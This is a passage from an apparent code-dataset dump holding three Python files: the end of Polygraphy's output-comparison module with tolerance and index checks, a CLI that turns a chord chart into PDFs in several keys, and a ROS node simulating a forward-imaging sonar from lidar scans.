In that case,\n use an empty string (\"\") as the key to specify default error stat for outputs not explicitly listed.\n Defaults to \"elemwise\".\n infinities_compare_equal (bool):\n If True, then matching +-inf values in the output have an absdiff of 0.\n If False, then matching +-inf values in the output have an absdiff of NaN.\n Defaults to False.\n save_heatmaps (str):\n [EXPERIMENTAL] Path to a directory in which to save figures of heatmaps of the absolute and relative error.\n Defaults to None.\n show_heatmaps (bool):\n [EXPERIMENTAL] Whether to display heatmaps of the absolute and relative error.\n Defaults to False.\n save_error_metrics_plot (str):\n [EXPERIMENTAL] Path to a directory in which to save the error metrics plots.\n Defaults to None.\n show_error_metrics_plot (bool):\n [EXPERIMENTAL] Whether to display the error metrics plot.\n\n Returns:\n Callable(IterationResult, IterationResult) -> OrderedDict[str, OutputCompareResult]:\n A callable that returns a mapping of output names to `OutputCompareResult` s, indicating\n whether the corresponding output matched.\n \"\"\"\n check_shapes = util.default(check_shapes, True)\n default_rtol = 1e-5\n default_atol = 1e-5\n rtol = util.default(rtol, default_rtol)\n atol = util.default(atol, default_atol)\n fail_fast = util.default(fail_fast, False)\n default_error_stat = \"elemwise\"\n check_error_stat = util.default(check_error_stat, default_error_stat)\n infinities_compare_equal = util.default(infinities_compare_equal, False)\n show_heatmaps = util.default(show_heatmaps, False)\n show_error_metrics_plot = util.default(show_error_metrics_plot, False)\n\n def check_outputs_match(\n out0,\n out0_name,\n out1,\n out1_name,\n per_out_rtol,\n per_out_atol,\n per_out_err_stat,\n runner0_name,\n runner1_name,\n ):\n \"\"\"\n Checks whether two outputs matched.\n\n Args:\n out0 (np.array): The first output.\n out0_name (str): The name of the first output.\n out1 (np.array): The second output.\n out1_name (str): The name of the second output.\n per_out_rtol (float): The relative tolerance to use for comparison.\n per_out_atol (float): The absolute tolerance to use for comparison.\n per_out_err_stat (str): The error statistic to check. See the docstring of ``simple`` for details.\n runner0_name (str): The name of the runner that generated the first output.\n runner1_name (str): The name of the runner that generated the second output.\n\n Returns:\n OutputCompareResult: Details on whether the outputs matched.\n \"\"\"\n VALID_CHECK_ERROR_STATS = [\"max\", \"mean\", \"median\", \"elemwise\"]\n if per_out_err_stat not in VALID_CHECK_ERROR_STATS:\n G_LOGGER.critical(\n f\"Invalid choice for check_error_stat: {per_out_err_stat}.\\nNote: Valid choices are: {VALID_CHECK_ERROR_STATS}\"\n )\n\n G_LOGGER.super_verbose(\n f\"{runner0_name:35} | Output: {out0_name} (dtype={out0.dtype}, shape={out0.shape}):\\n{util.indent_block(out0)}\"\n )\n G_LOGGER.super_verbose(\n f\"{runner1_name:35} | Output: {out1_name} (dtype={out1.dtype}, shape={out1.shape}):\\n{util.indent_block(out1)}\"\n )\n\n # Check difference vs. 
tolerances\n if np.issubdtype(out0.dtype, np.bool_) and np.issubdtype(out1.dtype, np.bool_):\n absdiff = np.logical_xor(out0, out1)\n else:\n absdiff = np.abs(comp_util.cast_up(out0) - comp_util.cast_up(out1))\n if infinities_compare_equal:\n out0_infinite = np.isinf(out0)\n cond = np.logical_and(out0_infinite, out0 == out1)\n absdiff = np.where(cond, 0, absdiff)\n\n # Add a small epsilon (2e-16) to zero values in the array to prevent NaN in relative error.\n cast_up_out1 = comp_util.cast_up(out1)\n\n if np.issubdtype(cast_up_out1.dtype, np.floating):\n if np.any(cast_up_out1 == 0):\n G_LOGGER.warning(\n f\"{runner1_name:35} | Output: {out1_name}: Some values are 0. \"\n f\"Will add a small epsilon quantity to these when computing relative difference. \"\n f\"Note that this may cause some relative differences to be extremely high. \",\n mode=LogMode.ONCE,\n )\n cast_up_out1[cast_up_out1 == 0] += np.finfo(float).eps\n\n reldiff = absdiff / np.abs(cast_up_out1)\n min_reldiff = comp_util.compute_min(reldiff)\n max_reldiff = comp_util.compute_max(reldiff)\n mean_reldiff = comp_util.compute_mean(reldiff)\n median_reldiff = comp_util.compute_median(reldiff)\n\n min_absdiff = comp_util.compute_min(absdiff)\n max_absdiff = comp_util.compute_max(absdiff)\n mean_absdiff = comp_util.compute_mean(absdiff)\n median_absdiff = comp_util.compute_median(absdiff)\n\n def stat_failed(diff, tol):\n return np.isnan(diff) or diff > tol\n\n if per_out_err_stat == \"mean\":\n failed = stat_failed(mean_absdiff, per_out_atol) and stat_failed(mean_reldiff, per_out_rtol)\n elif per_out_err_stat == \"median\":\n failed = stat_failed(median_absdiff, per_out_atol) and stat_failed(median_reldiff, per_out_rtol)\n elif per_out_err_stat == \"max\":\n failed = stat_failed(max_absdiff, per_out_atol) and stat_failed(max_reldiff, per_out_rtol)\n else:\n assert (\n per_out_err_stat == \"elemwise\"\n ), \"This branch should be unreachable unless per_out_err_stat is 'elemwise'\"\n with np.testing.suppress_warnings() as sup:\n sup.filter(RuntimeWarning)\n mismatches = ((absdiff > per_out_atol) | np.isnan(absdiff)) & (\n (reldiff > per_out_rtol) | np.isnan(reldiff)\n )\n\n failed = np.any(mismatches)\n try:\n with G_LOGGER.indent():\n G_LOGGER.super_verbose(f\"Mismatched indices:\\n{np.argwhere(mismatches)}\")\n G_LOGGER.extra_verbose(f\"{runner0_name:35} | Mismatched values:\\n{out0[mismatches]}\")\n G_LOGGER.extra_verbose(f\"{runner1_name:35} | Mismatched values:\\n{out1[mismatches]}\")\n except Exception as err:\n G_LOGGER.warning(f\"Failing to log mismatches.\\nNote: Error was: {err}\")\n\n # Log information about the outputs\n hist_bin_range = (\n min(comp_util.compute_min(out0), comp_util.compute_min(out1)),\n max(comp_util.compute_max(out0), comp_util.compute_max(out1)),\n )\n comp_util.log_output_stats(out0, failed, f\"{runner0_name}: {out0_name}\", hist_range=hist_bin_range)\n comp_util.log_output_stats(out1, failed, f\"{runner1_name}: {out1_name}\", hist_range=hist_bin_range)\n\n G_LOGGER.info(f\"Error Metrics: {out0_name}\")\n with G_LOGGER.indent():\n\n def req_tol(mean_diff, median_diff, max_diff):\n return {\n \"mean\": mean_diff,\n \"median\": median_diff,\n \"max\": max_diff,\n \"elemwise\": max_diff,\n }[per_out_err_stat]\n\n msg = f\"Minimum Required Tolerance: {per_out_err_stat} error | [abs={req_tol(mean_absdiff, median_absdiff, max_absdiff):.5g}] OR [rel={req_tol(mean_reldiff, median_reldiff, max_reldiff):.5g}]\"\n if per_out_err_stat == \"elemwise\":\n msg += \" (requirements may be lower if both abs/rel 
tolerances are set)\"\n G_LOGGER.info(msg)\n\n if save_error_metrics_plot or show_error_metrics_plot:\n with G_LOGGER.indent():\n comp_util.scatter_plot_error_magnitude(\n absdiff,\n reldiff,\n comp_util.cast_up(out1),\n min_reldiff,\n max_reldiff,\n runner0_name,\n runner1_name,\n out0_name,\n out1_name,\n save_dir=save_error_metrics_plot,\n show=show_error_metrics_plot,\n )\n\n def build_heatmaps(diff, min_diff, max_diff, prefix, use_lognorm=None):\n if save_heatmaps or show_heatmaps:\n with G_LOGGER.indent():\n comp_util.build_heatmaps(\n diff,\n min_diff,\n max_diff,\n prefix=f\"{prefix} Error | {out0_name}\",\n save_dir=save_heatmaps,\n show=show_heatmaps,\n use_lognorm=use_lognorm,\n )\n\n comp_util.log_output_stats(absdiff, failed, \"Absolute Difference\")\n build_heatmaps(absdiff, min_absdiff, max_absdiff, \"Absolute\")\n\n comp_util.log_output_stats(reldiff, failed, \"Relative Difference\")\n build_heatmaps(reldiff, min_reldiff, max_reldiff, \"Relative\", use_lognorm=True)\n\n G_LOGGER.extra_verbose(\n f\"Finished comparing: '{out0_name}' (dtype={out0.dtype}, shape={out0.shape}) [{runner0_name}] and '{out1_name}' (dtype={out1.dtype}, shape={out1.shape}) [{runner1_name}]\"\n )\n return OutputCompareResult(\n not failed, max_absdiff, max_reldiff, mean_absdiff, mean_reldiff, median_absdiff, median_reldiff\n )\n\n def compare_output(iter_result0, iter_result1):\n \"\"\"\n Compare the outputs of two runners from a single iteration.\n\n This function will always iterate over the output names of the first IterationResult,\n and attempt to find corresponding output names in the second.\n If no corresponding output name is found, the output is skipped.\n If all output names are skipped, then this function raises an error.\n\n Args:\n iter_result0 (IterationResult): The result of the first runner.\n iter_result1 (IterationResult): The result of the second runner.\n\n Returns:\n OrderedDict[str, OutputCompareResult]:\n The name of the outputs compared, derived from the first IterationResult,\n and whether they matched. If an output name is not found, it is omitted from this dictionary.\n\n Raises:\n PolygraphyException: If all output names are skipped, and thus no outputs are compared.\n \"\"\"\n\n def check_dict(dct, dict_name):\n if isinstance(dct, dict):\n util.check_sequence_contains(\n dct.keys(),\n set(iter_result0.keys()) | set(iter_result1.keys()) | {\"\"},\n name=dict_name,\n log_func=G_LOGGER.warning,\n check_missing=False,\n )\n\n check_dict(rtol, \"the rtol dictionary\")\n check_dict(atol, \"the atol dictionary\")\n check_dict(check_error_stat, \"the check_error_stat dictionary\")\n\n if not check_shapes:\n G_LOGGER.info(\"Strict shape checking disabled. Will attempt to match output shapes before comparisons\")\n\n def match(out0_name, output0, out1_name, output1):\n per_out_atol = util.value_or_from_dict(atol, out0_name, default_atol)\n per_out_rtol = util.value_or_from_dict(rtol, out0_name, default_rtol)\n per_out_err_stat = util.value_or_from_dict(check_error_stat, out0_name, default_error_stat)\n\n G_LOGGER.info(\n f\"Tolerance: [abs={per_out_atol:.5g}, rel={per_out_rtol:.5g}] | Checking {per_out_err_stat} error\"\n )\n G_LOGGER.extra_verbose(f\"Note: Comparing {iter_result0.runner_name} vs. {iter_result1.runner_name}\")\n\n if check_shapes and output0.shape != output1.shape:\n G_LOGGER.error(\n f\"Will not compare outputs of different shapes. 
Note: Output shapes are {output0.shape} and {output1.shape}.\"\n )\n G_LOGGER.error(\n \"Note: Use --no-shape-check or set check_shapes=False to \" \"attempt to compare values anyway.\",\n mode=LogMode.ONCE,\n )\n outputs_matched = False\n else:\n output1 = util.try_match_shape(output1, output0.shape)\n output0 = output0.reshape(output1.shape)\n outputs_matched = check_outputs_match(\n output0,\n out0_name,\n output1,\n out1_name,\n per_out_rtol=per_out_rtol,\n per_out_atol=per_out_atol,\n per_out_err_stat=per_out_err_stat,\n runner0_name=iter_result0.runner_name,\n runner1_name=iter_result1.runner_name,\n )\n\n # Finally show summary.\n if not outputs_matched:\n G_LOGGER.error(\n f\"FAILED | Output: '{out0_name}' | Difference exceeds tolerance (rel={per_out_rtol}, abs={per_out_atol})\"\n )\n else:\n G_LOGGER.finish(\n f\"PASSED | Output: '{out0_name}' | Difference is within tolerance (rel={per_out_rtol}, abs={per_out_atol})\"\n )\n\n return outputs_matched\n\n nonlocal find_output_func\n find_output_func = util.default(\n find_output_func, functools.partial(default_find_output_func, base_iter_result=iter_result0)\n )\n return run_comparison(match, fail_fast, iter_result0, iter_result1, find_output_func)\n\n return compare_output\n\n @staticmethod\n def indices(index_tolerance=None, fail_fast=None):\n \"\"\"\n Creates a function that compares two IterationResults containing indices, and can be used as the `compare_func` argument\n in ``Comparator.compare_accuracy``. This can be useful to compare, for example, the outputs of a Top-K operation.\n\n Outputs with more than one dimension are treated like multiple batches of values. For example, an output of shape (3, 4, 5, 10)\n would be treated like 60 batches (3 x 4 x 5) of 10 values each.\n\n Args:\n index_tolerance (Union[int, Dict[str, int]]):\n The tolerance to use when comparing indices. This is an integer indicating the maximum distance\n between values before it is considered a mismatch. For example, consider two outputs:\n ::\n\n output0 = [0, 1, 2]\n output1 = [1, 0, 2]\n\n With an index tolerance of 0, this would be considered a mismatch, since the positions of `0` and `1`\n are flipped between the two outputs. However, with an index tolerance of 1, it would pass since\n the mismatched values are only 1 spot apart. If instead the outputs were:\n ::\n\n output0 = [0, 1, 2]\n output1 = [1, 2, 0]\n\n Then we would require an index tolerance of 2, since the `0` value in the two outputs is 2 spots apart.\n\n When this value is set, the final 'index_tolerance' number of values are ignored for each batch.\n For example, with an index tolerance of 1, mismatches in the final element are not considered.\n If used with a Top-K output, you can compensate for this by instead using a Top-(K + index_tolerance).\n\n This can be provided on a per-output basis using a dictionary. 
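For example, index_tolerance={\"\": 0, \"top_k\": 1} (the output name is illustrative) demands exact positions everywhere except \"top_k\", where values may be displaced by one spot. 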
In that case,\n use an empty string (\"\") as the key to specify default tolerance for outputs not explicitly listed.\n\n fail_fast (bool):\n Whether the function should exit immediately after the first failure.\n Defaults to False.\n\n\n Returns:\n Callable(IterationResult, IterationResult) -> OrderedDict[str, bool]:\n A callable that returns a mapping of output names to `bool` s, indicating\n whether the corresponding output matched.\n\n \"\"\"\n index_tolerance = util.default(index_tolerance, 0)\n fail_fast = util.default(fail_fast, False)\n\n def compare_output(iter_result0, iter_result1):\n \"\"\"\n Compare the outputs of two runners from a single iteration.\n\n This function will always iterate over the output names of the first IterationResult,\n and attempt to find corresponding output names in the second.\n If no corresponding output name is found, the output is skipped.\n If all output names are skipped, then this function raises an error.\n\n Args:\n iter_result0 (IterationResult): The result of the first runner.\n iter_result1 (IterationResult): The result of the second runner.\n\n Returns:\n OrderedDict[str, bool]:\n The name of the outputs compared, derived from the first IterationResult,\n and whether they matched. If an output name is not found, it is omitted from this dictionary.\n\n Raises:\n PolygraphyException: If all output names are skipped, and thus no outputs are compared.\n \"\"\"\n\n def match(out0_name, output0, out1_name, output1):\n per_out_index_tol = util.value_or_from_dict(index_tolerance, out0_name, 0)\n\n if output0.shape != output1.shape:\n G_LOGGER.error(\"Cannot compare outputs of different shapes.\")\n return False\n\n passed = True\n for batch in np.ndindex(output0.shape[:-1]):\n out0_vals = output0[batch]\n if per_out_index_tol > 0:\n out0_vals = out0_vals[:-per_out_index_tol]\n out1_vals = output1[batch]\n\n for index0, val0 in enumerate(out0_vals):\n if val0 == out1_vals[index0]:\n continue\n\n index1 = np.argwhere(out1_vals == val0).ravel()\n if index1.size < 1:\n G_LOGGER.error(f\"FAILED | Value: {val0} not found in output\")\n passed = False\n if fail_fast:\n return False\n continue\n\n index1 = index1[0]\n\n if abs(index1 - index0) > per_out_index_tol:\n G_LOGGER.error(f\"FAILED | Difference exceeds index tolerance ({per_out_index_tol})\")\n passed = False\n if fail_fast:\n return False\n continue\n\n # Log information about the outputs\n hist_bin_range = (\n min(comp_util.compute_min(output0), comp_util.compute_min(output1)),\n max(comp_util.compute_max(output0), comp_util.compute_max(output1)),\n )\n comp_util.log_output_stats(\n output0, not passed, f\"{iter_result0.runner_name}: {out0_name}\", hist_range=hist_bin_range\n )\n comp_util.log_output_stats(\n output1, not passed, f\"{iter_result1.runner_name}: {out1_name}\", hist_range=hist_bin_range\n )\n\n if passed:\n G_LOGGER.finish(f\"PASSED | Difference is within index tolerance ({per_out_index_tol})\")\n return passed\n\n return run_comparison(\n match,\n fail_fast,\n iter_result0,\n iter_result1,\n functools.partial(default_find_output_func, base_iter_result=iter_result0),\n )\n\n return compare_output\n","repo_name":"NVIDIA/TensorRT","sub_path":"tools/Polygraphy/polygraphy/comparator/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":30309,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"3373871949","text":"#!/usr/bin/env python3\n\n\"\"\"\nTake in a music chart in raw text form.\nOutput 13 PDF's:\n- 
One in the Nashville Number System\n- One in each of the lettered keys\n\nDependencies:\n- pylatex package\n\"\"\"\n\nimport argparse\nimport os\nimport re\nimport signal\nimport sys\n\nfrom musiccharts import __version__\nfrom musiccharts import data_definitions as vars\nfrom musiccharts.data_processing import (format_line, process_document,\n validate_keys)\nfrom musiccharts.read_file import read_file_contents\n\n\ndef main():\n \"\"\"Execute main function.\"\"\"\n\n # ArgParse setup\n formatter_class = argparse.RawDescriptionHelpFormatter\n description = \"Description...\"\n epilog = f\"Version: {__version__}\\n \"\n parser = argparse.ArgumentParser(\n formatter_class=formatter_class, description=description, epilog=epilog\n )\n parser.add_argument(\"input\", nargs=\"*\", help=\"Input file\")\n parser.add_argument(\n \"-k\",\n \"--key\",\n default=\"NNS,Ab,A,Bb,B,C,Db,D,Eb,E,F,Gb,G\",\n dest=\"keys\",\n help='Desired keys, default is \"NNS,Ab,A,Bb,B,C,Db,D,Eb,E,F,Gb,G\"',\n metavar=\"\",\n type=str,\n )\n parser.add_argument(\n \"-n\",\n \"--name\",\n dest=\"dest_filename\",\n help=\"Destination filename\",\n metavar=\"\",\n type=str,\n )\n parser.add_argument(\n \"-s\",\n \"--size\",\n default=vars.BASE_FONT_SIZE,\n choices=vars.ALL_FONT_SIZES,\n dest=\"font_size\",\n help=f\"Available font sizes: {vars.ALL_FONT_SIZES}\",\n metavar=\"\",\n type=float,\n )\n parser.add_argument(\n \"--tex\",\n dest=\"keep_tex\",\n action=\"store_false\",\n help=\"Output LaTeX file in addition to PDFs\",\n )\n args = parser.parse_args()\n if len(args.input) > 1:\n print(\"\\nError: more than one source file provided for processing!\\n\")\n sys.exit(1)\n elif len(args.input) < 1:\n parser.print_help()\n sys.exit(1)\n else:\n src_filename = args.input[0]\n\n # Process provided filename\n file_contents = read_file_contents(filename=src_filename)\n\n if args.dest_filename:\n dest_filename = args.dest_filename\n else:\n dest_filename = re.sub(r\"(.*/)*([^.]*)(\\..*)\", r\"\\2\", src_filename)\n\n # Save and validate user-provided keys\n keys = args.keys.split(\",\")\n validate_keys(keys)\n\n # Process formatting for each individual line of text\n for key in keys:\n formatted_lines = []\n chord_errors = []\n i = 0\n next_line_after_intro = False\n for line in file_contents:\n results = format_line(\n line=line,\n line_num=i,\n key=key,\n next_line_after_intro=next_line_after_intro,\n debug=False,\n )\n next_line_after_intro = results.get(\"next_line_after_intro\")\n formatted_lines.append(results.get(\"edits\"))\n chord_errors.extend(results.get(\"errors\"))\n i += 1\n\n # Display specific invalid chord errors\n if len(chord_errors) > 0:\n print(\"\\nError: invalid chord syntax found\")\n print(\"----------------------------------\")\n for match in chord_errors:\n print(\n f\"Line {str(match.get('line_num')).ljust(3)}: {match.get('chord')}\"\n )\n print(\"\")\n sys.exit(1)\n\n # Create the document\n process_document(\n dest_filename=f\"{dest_filename} ({key})\",\n path=os.getcwd(),\n file_contents=formatted_lines,\n font_size=args.font_size,\n keep_tex=args.keep_tex,\n )\n\n\n# Call main function\nif __name__ == \"__main__\":\n main()\n","repo_name":"jwcorell/musiccharts","sub_path":"musiccharts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20509621135","text":"#!/usr/bin/env python\n\n\n'''\n This script will simulate a forward looking imaging sonar using a gazebo 
lidar\n'''\n\n# Following line changes the order in which Python checks for packages\nimport os\nimport sys\nimport rospy\nimport numpy as np\nimport math\nimport rospkg\nimport tf.transformations as trans\nimport scipy.misc\nimport cv2\nimport copy\nfrom sensor_msgs.msg import LaserScan, Image\nfrom std_msgs.msg import Float32MultiArray\nfrom nav_msgs.msg import Odometry\nfrom collections import deque\nfrom cv_bridge import CvBridge\nfrom scipy import interpolate\nfrom scipy.spatial.transform import Rotation as R\nimport torch\n\nclass GT():\n SEAFLOOR = [0, 255, 0]\n PIPE = [255, 0, 0]\n UNKNOWN = [0, 0, 0]\n DEBRIS = [0, 0, 255]\n\nclass ForwardImagingSonar(object):\n def __init__(self):\n np.set_printoptions(suppress=True)\n # Get RosParams\n self.namespace = rospy.get_namespace().replace('/', '')\n self.z_scale = int(rospy.get_param('~z_scale', 2))\n self.beam_width = float(rospy.get_param('~beam_width', 1.5708))\n self.sonar_noise = float(rospy.get_param('~sonar_noise', 25))\n self.fis_bins = int(rospy.get_param('~fis_bins', 360))\n # Compared to 15m altitude -> Ideal scan altitude\n self.nominal_alt = int(rospy.get_param('~nominal_alt', 15))\n self.laser_topic = rospy.get_param('~laser_topic', \"\")\n print(\"[ VU FIS ] laser topic: \", self.laser_topic)\n self.uuv_rpy = None\n self.uuv_position = [0,0,0]\n self.delta_source = None\n self.d_trans = [0,0,0]\n self.d_rot = [0,0,0]\n self.fis_scan = []\n self.fis_gt_scan = []\n self.pcl_size = 250\n self.pcl_dq = deque(maxlen=self.pcl_size)\n rp = rospkg.RosPack()\n filename = rp.get_path(\"vandy_bluerov\") + \"/nodes/sonars/fis_mask.png\"\n self.sonar_mask = cv2.imread(filename, 0) \n \n\n # Initialize subscribers/publishers\n self.fis_scan_pub = rospy.Publisher(\n '/vu_fis/scan', Image, queue_size=1)\n \n self.fis_scan_gt_pub = rospy.Publisher(\n '/vu_fis/scan_gt', Image, queue_size=1)\n\n self.cvbridge = CvBridge()\n self.odometry_sub = rospy.Subscriber(\n '/uuv0/pose_gt_noisy_ned', Odometry, self.callback_odometry, queue_size=1) \n \n if self.laser_topic == '/scan':\n self.sub = rospy.Subscriber(\n \"/scan\", LaserScan, self.rplidar_callback, queue_size=1) \n else:\n self.sub = rospy.Subscriber(\n \"vu_fis\", LaserScan, self.laser_callback, queue_size=1)\n \n rate = rospy.Rate(1)\n while not rospy.is_shutdown():\n if len(self.fis_scan) > 0:\n # Create scan and gt image message and publish them\n msg, msg_gt = self.create_cvimage(self.fis_scan, sonar_noise=self.sonar_noise)\n msg.header.frame_id = \"fis\"\n self.fis_scan_pub.publish(msg)\n\n msg_gt.header.frame_id = \"fis\"\n self.fis_scan_gt_pub.publish(msg_gt)\n \n rate.sleep()\n\n def rplidar_callback(self, msg):\n '''\n This method handles input from real HW (RPLidar) to create FIS\n '''\n # RpLidar defaults:\n # current scan mode: Sensitivity, sample rate: 8 Khz, max_distance: 12.0 m, scan frequency:10.0 Hz, \n\n # Transform rays to height scan line\n ranges = np.array(msg.ranges) \n # print(np.ma.masked_invalid(abs(ranges)).mean()) \n ranges *= 40 # self.nominal_alt / np.ma.masked_invalid(abs(ranges)).mean()\n scan = self.transform_scan(ranges[405:765], self.fis_bins)\n self.transform_pcl()\n self.pcl_dq.append(scan)\n self.fis_scan = self.pcl_to_image(self.pcl_dq)\n self.fis_gt_scan = self.pcl_to_image(self.pcl_dq, gt=True)\n \n def laser_callback(self, msg):\n '''\n This method handles input from Gazebo (simulated FIS)\n '''\n # Transform rays to height scan line\n # print(\"laser_callback\")\n scan = self.transform_scan(np.array(msg.ranges), self.fis_bins)\n \n 
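# Motion-compensate the scans already in the deque (transform_pcl shifts them by\n        # the pose change since the last update) before appending the new scan and\n        # rasterizing the accumulated point cloud into scan and ground-truth images:\n        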
self.transform_pcl()\n        self.pcl_dq.append(scan)\n        self.fis_scan = self.pcl_to_image(self.pcl_dq)\n        self.fis_gt_scan = self.pcl_to_image(self.pcl_dq, gt=True)\n    \n    def transform_pcl(self):\n        if self.delta_source is not None:\n            self.d_trans = np.array(self.uuv_position) - np.array(self.delta_source[0])\n            self.d_rot = np.array(self.uuv_rpy) - np.array(self.delta_source[1])\n            # Ignore d_roll\n            # self.d_rot[0] = 0\n            # Ignore d_pitch\n            # self.d_rot[1] = 0\n            # Calculate fwd movement\n            d_fwd_trans = math.sqrt(2*self.d_trans[0]**2)\n        self.delta_source = [self.uuv_position, self.uuv_rpy]\n        \n        \n        if len(self.pcl_dq) > 0:\n            for i in range(len(self.pcl_dq)):\n                # apply translation\n                self.pcl_dq[i][:] -= [0, d_fwd_trans, -self.d_trans[2]]\n                # apply Yaw rotation\n                r = R.from_euler('zxy', self.d_rot, degrees=False)\n                self.pcl_dq[i][:] = r.apply(self.pcl_dq[i][:])\n    \n    def pcl_to_image(self, pcl, img_size=(240, 240), gt=False):\n        img=np.full(img_size, -np.inf)\n        scale = 7\n        offset = 80\n        for points in pcl:\n            for point in points:\n                # print(point)\n                coord = tuple((\n                    int(img_size[0] - point[1]*scale - offset),\n                    int(point[0]*scale + img_size[1]//2)\n                    ))\n                if self.check_valid_coord(coord, img_size):\n                    if not gt:\n                        img[coord] = 255 - point[2]*10\n                    else:\n                        img[coord] = point[2]\n        return img\n    \n    \n    def check_valid_coord(self, coord, img_size):\n        if 0 <= coord[0] < img_size[0] and 0 <= coord[1] < img_size[1]:\n            return True\n        return False\n\n    def create_cvimage(self, img, sonar_noise=25):\n        # ratio = 1/((np.nanmax(img[img != np.inf]) - np.nanmin(img[img != -np.inf]))/255)\n        # img -= np.nanmin(img[img != -np.inf])\n        # print(\"*** \"+str(ratio)+\" *** \"+str(np.nanmin(img[img != -np.inf])))\n\n        ratio = 7\n        img -= 400\n        img *= ratio * 0.75\n        img[img != -np.inf] = 32+255-img[img != -np.inf]\n\n        # Closing\n        kernel = np.ones((5,1),np.uint8)\n        img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n\n        # Passing for gt\n        raw_scan = copy.deepcopy(img)\n        # raw_scan[img == -np.inf] = np.nanmin(img[img != -np.inf])\n        gt_img = self.create_gt_cvimage(raw_scan)\n\n        # adding noise\n        noise = np.random.normal(0, sonar_noise, np.shape(img))\n        img[img>0] += noise[img>0]\n\n        img[img>255]=255\n        img[img<0]=0\n\n        # Distortion for making radial blur\n        pts1 = np.float32([[50,0],[189,0],[0,239],[239,239]])\n        pts2 = np.float32([[0,0],[239,0],[0,239],[239,239]])\n        M = cv2.getPerspectiveTransform(pts2,pts1)\n        img = cv2.warpPerspective(img,M,(240,240))\n\n        # sonar noise, motion/radial blur\n        size = 9\n        kernel_motion_blur = np.zeros((size, size))\n        kernel_motion_blur[:, int((size-1)/2)] = np.ones(size)\n        kernel_motion_blur = kernel_motion_blur / size\n        \n        # applying the kernel to the input image\n        img = cv2.filter2D(img, -1, kernel_motion_blur)\n        \n        # reverting distortion\n        M = cv2.getPerspectiveTransform(pts1,pts2)\n        img = cv2.warpPerspective(img,M,(240,240))\n        \n        img[img>255]=255\n        img[img<0]=0\n\n        # apply masks\n        img = cv2.bitwise_and(img, img, mask=self.sonar_mask)\n        gt_img = cv2.bitwise_and(gt_img, gt_img, mask=self.sonar_mask)\n\n        return self.cvbridge.cv2_to_imgmsg(img.astype(np.uint8), encoding=\"mono8\"), self.cvbridge.cv2_to_imgmsg(gt_img.astype(np.uint8), encoding=\"rgb8\")\n    \n\n    def create_gt_cvimage(self, img):\n        # Color GT Scan\n        img[img>255]=255\n        img[img<0]=0\n        mean_val = np.nanmean(img[img != -np.inf])//1\n\n        # Calculated GT\n        gt_img = np.zeros((np.shape(img)[0], np.shape(img)[1], 3))\n        threshold_g = cv2.adaptiveThreshold(cv2.GaussianBlur(img.astype(np.uint8),(5,5),0),255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, 
cv2.THRESH_BINARY,55,0)\n\n        # Define lower/upper value\n        lower = mean_val - 10\n        upper = 255\n\n        # Check the region of the image actually with a color in the range defined below\n        # inRange returns a matrix in black and white\n        # threshold_g = cv2.inRange(img, lower, upper)\n\n        # img = np.where(threshold_g <= 0, -3000, img) # Unknown BLACK\n        img_t = copy.deepcopy(img)\n        # img[img!=] = -3000\n        try:\n            img_t[threshold_g == 0] = mean_val\n        except ValueError:\n            pass\n        blur = cv2.GaussianBlur(img_t.astype(np.uint8),(5,5),0)\n        _,threshold = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n        img = np.where(threshold > 0, -1000, img)\n        img = np.where(threshold <= 0, 0, img)\n        img[threshold_g == 0] = -3000\n        \n\n        # img = np.where(threshold > 0, -2000, img) # Debris/Unknown BLUE\n        # img = np.where(np.logical_and(img > self.nominal_alt , img <= self.nominal_alt+50), -1000, img) # Pipeline RED\n        # img = np.where(img > mean_val-100, 0, img) # Seabed GREEN\n\n        gt_img[np.array(img) == 0] = GT.SEAFLOOR\n        gt_img[np.array(img) == -1000] = GT.PIPE\n        gt_img[np.array(img) == -2000] = GT.PIPE #GT.DEBRIS\n        gt_img[np.array(img) < -2000] = GT.UNKNOWN\n\n        # Denoise/Close\n        kernel = np.ones((5,1),np.uint8)\n        gt_img = cv2.morphologyEx(gt_img, cv2.MORPH_CLOSE, kernel)\n\n        # Return RGB image\n        return gt_img\n\n    def transform_scan(self, rays, fis_width):\n        # using GT depth\n        # nominal_alt = 60 - self.uuv_position[2] # Nominal sea depth - GT depth\n        nominal_alt = self.nominal_alt\n        vertical_offset_angle = -self.beam_width/2\n        ray_step_angle = self.beam_width / fis_width\n        pcl = []\n\n        for step in range(fis_width):\n            # Project rays to the reference flat seafloor\n            if self.uuv_rpy is not None:\n                roll_compensation = self.uuv_rpy[0]\n                pitch_compensation = self.uuv_rpy[1]\n            else:\n                roll_compensation = 0\n                pitch_compensation = 0\n            \n            scan_alpha = ((step + 0.5) * ray_step_angle + vertical_offset_angle)\n            sonar_pitch = math.radians(-45)\n            \n            # information from movement\n            delta_rot = [0,0,0]\n            delta_trans = [0,0,0]\n\n            # [y p r]\n            rot = [\n                scan_alpha,\n                sonar_pitch + pitch_compensation,\n                roll_compensation\n            ]\n\n            echo = [0, rays[step], 0]\n\n            if np.isfinite(rays[step]):\n                r = R.from_euler('zxy', rot, degrees=False)\n                point = r.apply(echo)\n                pcl.append(point)\n                # print(str(math.degrees(scan_alpha)) + \" \" + str(point))\n        return np.array(pcl)\n\n    def callback_odometry(self, msg):\n        pos = [msg.pose.pose.position.x,\n               msg.pose.pose.position.y,\n               msg.pose.pose.position.z]\n\n        quat = [msg.pose.pose.orientation.x,\n                msg.pose.pose.orientation.y,\n                msg.pose.pose.orientation.z,\n                msg.pose.pose.orientation.w]\n\n        # Extract the position and orientation of the message\n        p = self.vector_to_np(msg.pose.pose.position)\n        self.uuv_position = p\n\n        q = self.quaternion_to_np(msg.pose.pose.orientation)\n        uuv_rpy = trans.euler_from_quaternion(q, axes='sxyz')\n        self.uuv_rpy = uuv_rpy\n    \n    def vector_to_np(self, v):\n        return np.array([v.x, v.y, v.z])\n    \n    def quaternion_to_np(self, q):\n        return np.array([q.x, q.y, q.z, q.w])\n\n    \n\nif __name__ == \"__main__\":\n    rospy.init_node(\"FIS_Waterfall\")\n    fis = ForwardImagingSonar()\n    